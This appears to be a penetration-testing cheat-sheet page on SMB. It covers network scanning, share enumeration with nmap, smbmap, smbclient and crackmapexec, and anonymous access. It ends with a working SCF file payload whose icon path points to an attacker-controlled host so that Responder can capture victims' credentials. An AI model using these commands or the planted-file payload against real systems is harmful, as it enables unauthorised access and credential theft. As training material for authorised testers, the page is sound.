PORT 139,445/tcp - SMB

SMB stands for Server Message Block. It’s a protocol for sharing resources like files, printers, in general any resource which should be retreivable or made available by the server.

Introduction

It primarily runs on port 445 or port 139 depending on the server . It is actually natively available in windows, so windows users don’t need to configure anything extra as such besides basic setting up. In Linux however ,it is a little different. To make it work for Linux, you need to install a samba server because Linux natively does not use SMB protocol.

Scanning the network

Nmap

We can do a port scanner selecting the NetBIOS and SMB ports:

nmap -v -p 139,445 -oG smb.nmap <ip-addr>/<mask>
grep "Up" smb.nmap | cut -d " " -f 2

Nbtscan

We can scan for NetBIOS Service around the network in order to collect additional NetBIOS information like server names:

sudo nbtscan -r <ip-addr>/<mask>

Enumeration a target

Nmap scripts

Nmap contains many useful NSE scripts that can be used to discover and enumerate SMB services. All these scripts are in the folder /usr/share/nmap/scripts/

ls -l /usr/share/nmap/scripts/smb*

You can launch the script with the --script parameter:

nmap -v -p 139,445 --script=<script> <ip-addr>

Enum4linux

Enum4linux is an script that automatize some tasks:

enum4linux -a [-u <user> -p <pass>"] <ip-addr>

Shared Folders

There are some available nmap scripts that could help us in that work:

nmap -p 139,445 -sV --script smb-\* <ip-addr>

smbmap will shows us available shares and permissions:

smbmap -H <ip-addr>
#Example Output
[+] Guest session       IP: ip-addr:445   Name: ip-addr
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        anonymous                                               READ ONLY
        IPC$                                                    NO ACCESS       IPC Service (kenobi server (Samba, Ubuntu))

And we can connect to these shares with smbclient:

smbclient //<ip-addr>/<share>                # Guest Session
smbclient //<ip-addr>/<share> -U "" -N       # Null Session
smbclient //<ip-addr>/<share> -U <user>      # Authenticated Session

# Older versions
smbclient //<ip-addr>/<share> --option='client min protocol=NT1'

To download recursively all the share you can use smbget:

smbget -R smb://<ip-addr>/<share>
smbget -R smb://<ip-addr>/<share> -U <user>

Also you could enumerate shares with crackmapexec:

crackmapexec smb <ip-addr> -u '' -p '' --shares #Null user
crackmapexec smb <ip-addr> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <ip-addr> -u 'username' -H '<HASH>' --shares #Guest user

Finally you can mount the share on your kali.

sudo mount -t cifs -o vers=2.0,username=guest,password=guest //<ip-addr>/<share>

Shell Command Files (SCF) attack

It is not new that SCF (Shell Command Files) files can be used to perform a limited set of operations such as showing the Windows desktop or opening a Windows explorer. However a SCF file can be used to access a specific UNC path which allows the penetration tester to build an attack. The code below can be placed inside a text file which then needs to be planted into a network share.

[Shell]
Command=2
IconFile=\\<OUR.IP>\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

Adding the @ symbol in front of the filename will place the file on the top of the share drive.

Filename: @attack.scf

When the user will browse the share a connection will established automatically from his system to the UNC path that is contained inside the SCF file. Windows will try to authenticate to that share with the username and the password of the user, so we can capture it with Responder.

responder -I eth0

References:

PreviousPORT 143,993/tcp - IMAPNextPORT 161/udp - SNMP

Last updated